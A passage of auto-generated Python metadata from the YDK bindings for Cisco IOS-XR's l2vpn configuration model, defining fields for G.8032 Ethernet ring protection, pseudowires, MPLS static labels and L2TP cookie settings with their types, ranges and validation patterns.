[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port0 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port0 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
False,
[
_MetaInfoClassMember('erp-port0', REFERENCE_LIST, 'ErpPort0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
[], [],
''' Configure ERP main port0
''',
'erp_port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
False,
[
_MetaInfoClassMember('port', REFERENCE_ENUM_CLASS, 'ErpPort1Enum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPort1Enum',
[], [],
''' ERP main port number
''',
'port',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'RplRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'RplRoleEnum',
[], [],
''' RPL role
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'rpl',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
False,
[
_MetaInfoClassMember('aps-channel', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port1 APS channel in the format of
InterfaceName, BDName or XconnectName
''',
'aps_channel',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('aps-type', REFERENCE_ENUM_CLASS, 'ErpapsEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpapsEnum',
[], [],
''' Port1 APS type
''',
'aps_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable automatic protection switching
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('level', ATTRIBUTE, 'int' , None, None,
[('0', '7')], [],
''' Automatic protection switching level
''',
'level',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port0', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port0 APS channel in the format of
InterfaceName
''',
'port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port1', REFERENCE_CLASS, 'Port1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
[], [],
''' APS channel for ERP port1
''',
'port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'aps',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
False,
[
_MetaInfoClassMember('erp-instance-id', ATTRIBUTE, 'int' , None, None,
[('1', '2')], [],
''' ERP instance number
''',
'erp_instance_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('aps', REFERENCE_CLASS, 'Aps' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
[], [],
''' Automatic protection switching
''',
'aps',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('description', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance
description
''',
'description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('inclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
                    ''' Associates a set of VLAN IDs with the
                    G.8032 instance
''',
'inclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance profile
''',
'profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('rpl', REFERENCE_CLASS, 'Rpl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
[], [],
''' Ring protection link
''',
'rpl',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
False,
[
_MetaInfoClassMember('erp-instance', REFERENCE_LIST, 'ErpInstance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
[], [],
''' Ethernet ring protection instance
''',
'erp_instance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instances',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
False,
[
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'none',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port1 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'virtual-or-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
False,
[
_MetaInfoClassMember('erp-port-type', REFERENCE_ENUM_CLASS, 'ErpPortEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPortEnum',
[], [],
''' Port1 type
''',
'erp_port_type',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('none', REFERENCE_CLASS, 'None_' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
[], [],
''' none
''',
'none',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('virtual-or-interface', REFERENCE_LIST, 'VirtualOrInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
[], [],
''' virtual or interface
''',
'virtual_or_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
False,
[
_MetaInfoClassMember('erp-port1', REFERENCE_LIST, 'ErpPort1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
[], [],
''' Ethernet ring protection port1
''',
'erp_port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring',
False,
[
_MetaInfoClassMember('g8032-ring-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the G8032 ring
''',
'g8032_ring_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('erp-instances', REFERENCE_CLASS, 'ErpInstances' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
[], [],
''' List of ethernet ring protection instance
''',
'erp_instances',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port0s', REFERENCE_CLASS, 'ErpPort0S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port0s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port1s', REFERENCE_CLASS, 'ErpPort1S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
[], [],
                    ''' Ethernet ring protection port1
''',
'erp_port1s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-provider-bridge', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ethernet ring protection provider bridge
''',
'erp_provider_bridge',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('exclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
                    ''' Vlan IDs in the format of
                    a-b,c,d,e-f,g,untagged
''',
'exclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('open-ring', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Specify the G.8032 instance as open ring
''',
'open_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-ring',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings',
False,
[
_MetaInfoClassMember('g8032-ring', REFERENCE_LIST, 'G8032Ring' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring',
[], [],
''' G8032 Ring
''',
'g8032_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-rings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
False,
[
_MetaInfoClassMember('backup-attachment-circuit', REFERENCE_LIST, 'BackupAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
[], [],
''' Backup attachment circuit
''',
'backup_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Remote AC ID
''',
'remote_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('source-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Source AC ID
''',
'source_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
False,
[
_MetaInfoClassMember('pseudowire-evpn', REFERENCE_LIST, 'PseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
[], [],
''' EVPN P2P Service Configuration
''',
'pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
